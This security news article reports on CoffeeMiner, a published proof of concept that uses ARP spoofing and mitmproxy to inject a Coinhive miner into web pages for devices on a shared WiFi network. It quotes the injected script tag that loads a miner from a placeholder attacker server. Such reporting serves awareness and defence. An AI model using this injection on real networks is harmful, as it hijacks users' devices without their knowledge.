Categories: Security News

CoffeeMiner – Hacking into WiFi Networks to Inject Cryptocurrency Miners

Cryptocurrency Miners are in the raise starting from last year, more than 500 million computers are mining cryptoCurrency in their browsers without the user’s knowledge.

A developer named Arnau published the CoffeeMiner script which intercepts the traffic between the users and the routers to inject scripts into HTML pages.

Arnau published a PoC explaining how a MITM attack performed (Man(Person)-In-The-Middle) to inject some javascript in the HTML pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.

Attack Scenario – CoffeeMiner

CoffeeMiner employees ARPspoofing(used for resolving network layer address (IP) into link layer address (MAC)) for spoofing messages onto a local area network.

Also Read Xerosploit – Toolkit to Perform MITM, Spoofing, DOS, Images Sniffing/Replacement, WD Attacks

The mitmproxy used to analyze the traffic flow and to edit the traffic data. Here he injected a line of code into HTML pages that call the javascript cryptocurrency miner which is deployed in the in the attacker machine.

Injected Code

<script src=”http://httpserverIP:8000/script.js”></script>

Arnau used CoinHive javascript miner, “Coinhive offers a JavaScript miner for the Monero Blockchain that can be embedded into other Websites. The users run the miner directly in their Browser and mine XMR for the site owner in turn for an ad-free experience, in-game currency or whatever incentives they are availing to their users/visitors”.

He set up a Virtual box environment to demonstrate this and also published PoC video.

Now the CoffeeMiner works only with HTTP version and not with HTTPs, Arnau said he will be adding sslstrip to inject with HTTPS sites and autonomous Nmap scan, to add the IPs detected to the CoffeeMiner victim’s list.

The complete source code of CoffeeMiner published in GitHub.

Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Recent Posts

Progress WhatsUp Gold Path Traversal Vulnerability Exposes Systems to Remote code Execution

A newly disclosed path traversal vulnerability (CVE-2024-4885) in Progress Software’s WhatsUp Gold network monitoring solution…

12 minutes ago

CISA Alerts on Active Exploitation of Cisco Small Business Router Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent warning on March 3,…

54 minutes ago

Threat Actors Exploiting AES Encryption for Stealthy Payload Protection

Cybersecurity researchers have uncovered a surge in the use of Advanced Encryption Standard (AES) encryption…

12 hours ago

33.3 Million Cyber Attacks Targeted Mobile Devices in 2024 as Threats Surge

Kaspersky's latest report on mobile malware evolution in 2024 reveals a significant increase in cyber…

12 hours ago

Routers Under Attack as Scanning Attacks on IoT and Networks Surge to Record Highs

In a concerning trend, the frequency of scanning attacks targeting Internet of Things (IoT) devices…

12 hours ago

Google Launches Shielded Email to Keep Your Address Hidden from Apps

Google is rolling out a new privacy-focused feature called Shielded Email, designed to prevent apps and…

17 hours ago